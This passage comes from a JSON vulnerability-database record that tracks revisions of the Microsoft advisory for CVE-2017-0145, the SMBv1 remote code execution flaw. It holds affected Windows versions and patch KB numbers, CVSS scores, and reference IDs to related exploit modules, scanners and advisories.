2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, 
{"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": 
"Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": 
"KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T16:50:29", "differentElements": ["msAffectedSoftware"], "edition": 53}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-17T18:44:02", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", 
"MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4013198", "KB3212646", "KB4012216", "KB4012606", "KB4012214", "KB3210720", "KBMS16-110, 3187754", "KB4012213", "KB3205409", "KB4012212", "KB4013429", "KB3177186", "KB4012215", "KB4012217", "KB4012598", "KB3213986", "KB3205401", "KB4014077"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": 
"KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based 
systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T18:44:02", "differentElements": ["msAffectedSoftware"], "edition": 54}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that 
the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-17T20:55:04", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
"MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4013198", "KB3212646", "KB4012216", "KB4012606", "KB4012214", "KB3210720", "KBMS16-110, 3187754", "KB4012213", "KB3205409", "KB4012212", "KB4013429", "KB3177186", "KB4012215", "KB4012217", "KB4012598", "KB3213986", "KB3205401", "KB4014077"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": 
"Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", 
"kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core 
